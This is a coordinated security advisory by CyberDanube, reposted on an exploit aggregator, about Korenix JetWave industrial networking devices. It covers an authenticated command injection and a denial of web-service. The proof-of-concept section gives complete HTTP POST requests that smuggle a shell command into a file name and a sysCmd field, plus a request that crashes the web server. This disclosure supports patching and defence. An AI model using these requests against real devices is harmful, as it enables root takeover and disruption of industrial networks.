## https://sploitus.com/exploit?id=PACKETSTORM:171004
CyberDanube Security Research 20230213-0
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| JetWave4221 HP-E, JetWave 2212G, JetWave
2212X/2212S,
| JetWave 2211C, JetWave 2411/2111, JetWave
2411L/2111L,
| JetWave 2414/2114, JetWave 2424, JetWave 2460,
| JetWave 3220/3420 V3
vulnerable version| See "Vulnerable Versions"
fixed version| See "Solution"
CVE number| requested
impact| High
homepage| https://korenix.com/
found| 2022-11-28
by| S. Dietz, T. Weber (Office Vienna)
| CyberDanube Security Research
| Vienna | St. Pölten
|
| https://www.cyberdanube.com
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
"Korenix Technology, a Beijer group company within the Industrial
Communication
business area, is a global leading manufacturer providing innovative,
market-
oriented, value-focused Industrial Wired and Wireless Networking Solutions.
[...]
Our products are mainly applied in SMART industries: Surveillance, Machine-
to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide
customer base covers different Sales channels, including end-customers,
OEMs,
system integrators, and brand label partners."
Source:
https://www.korenix.com/en/about/index.aspx?kind=3
Vulnerable Versions:
-------------------------------------------------------------------------------
The following firmware versions have been found to be vulnerable by
CyberDanube:
* Korenix JetWave4221 HP-E <= V1.3.0
* Korenix JetWave 3220/3420 V3 < V1.7
The following firmware versions have been identified to be vulnerable by the
vendor:
* Korenix JetWave 2212G V1.3.T
* Korenix JetWave 2212X/2112S V1.3.0
* Korenix JetWave 2211C < V1.6
* Korenix JetWave 2411/2111 < V1.5
* Korenix JetWave 2411L/2111L < V1.6
* Korenix JetWave 2414/2114 < V1.4
* Korenix JetWave 2424 < V1.3
* Korenix JetWave 2460 < V1.6
Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection.
It allows an attacker to gain full access to the underlying operating
system of
the device with all implications. If such a device is acting as key
device in
an industrial network, or controls various critical equipment via serial
ports,
more extensive damage in the corresponding network can be done by an
attacker.
2) Authenticated Denial of Web-Service
When logged in, a user can issue a POST request such that the underlying
binary
exits. The Web-Service becomes unavailable and cannot be accessed until the
device gets rebooted.
Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Command Injection
1.a)
The command "touch /tmp/poc" was injected to the system by using the
following
POST request:
===============================================================================
POST /goform/formTFTPLoadSave HTTP/1.1
Host: 172.16.0.38
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0)
Gecko/20100101 Firefox/107.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: http://172.16.0.38
Connection: close
Referer: http://172.16.0.38/mgmtsaveconf.asp
Cookie:
-common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45
Upgrade-Insecure-Requests: 1
submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit
===============================================================================
The command gets executed as root and a file under the folder /tmp/ is
created.
1.b)
The command "touch /tmp/poc2" was injected to the system by using the
following
POST request:
===============================================================================
POST /goform/formSysCmd HTTP/1.1
Host: 172.16.0.38
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: 172.16.0.38
Cookie:
-common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb
Content-Length: 40
sysCmd=touch%20/tmp/poc2&submit-url=
===============================================================================
The command gets executed as root and a file under the folder /tmp/ is
created.
Command output is written into /tmp/syscmd.
2) Authenticated Denial of Web-Service
The process goahead chrashes when the following POST request is sent to the
endpoint /goform/formDefault:
===============================================================================
POST /goform/formDefault HTTP/1.1
Host: 172.16.0.38
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0)
Gecko/20100101 Firefox/107.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://172.16.0.38
Connection: close
Referer: http://172.16.0.38/toolping.asp
Cookie:
-common-web-session-=::webs.session::3c624961199904f380e978a3967cc356
Upgrade-Insecure-Requests: 1
PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping
===============================================================================
The output was observed on the terminal using our emulated instance:
===============================================================================
rm: invalid option -- /
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary
Usage: rm [OPTION]... FILE...
Remove (unlink) the FILE(s). You may use '--' to
indicate that all following arguments are non-options.
Options:
-i always prompt before removing each destination
-f remove existing destinations, never prompt
-r or -R remove the contents of directories recursively
killall: wlwatchdog: no process killed
killall: wlapwatchdog: no process killed
===============================================================================
The vulnerabilities were manually verified on an emulated device by
using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
Solution
-------------------------------------------------------------------------------
Owner of these products are suggested to update to the following versions:
* Korenix JetWave 4221 HP-E V1.4.0
* Korenix JetWave 2212G V1.10
* Korenix JetWave 2212X/2112S V1.11
* Korenix JetWave 2211C V1.6
* Korenix JetWave 2411/2111 V1.5
* Korenix JetWave 2411L/2111L V1.6
* Korenix JetWave 2414/2114 V1.4
* Korenix JetWave 2424 V1.3
* Korenix JetWave 2460 V1.6
* Korenix JetWave 3220/3420 V3 V1.7
Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends customers from Korenix to upgrade the firmware to the
latest version available. Furthermore, a full security review by
professionals
is recommended.
Contact Timeline
-------------------------------------------------------------------------------
2022-12-05: Contacting Beijer Electronics Group via cs@beijerelectronics.com
2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were
confirmed by
the vendor. The vendor planned to fix the vulnerabilities
in the
next 1.5 months.
2023-01-04: Contact shared the updated firmware version. CyberDanube checked
if the vulnerabilities got fixed. The contact communicated
that
not only JetWave4221 is vulnerable to these issues. Therefore,
CyberDanube postponed the release of the Advisory until the
other
products have been patched.
2023-01-30: Meeting with Beijer Electronics. Customer get informed about the
issues. Fixes got published. Disclosure date got shifted to
2023-02-13 to provide a time-window for patching.
2023-02-13: Coordinated release of security advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF S. Dietz, T. Weber / @2023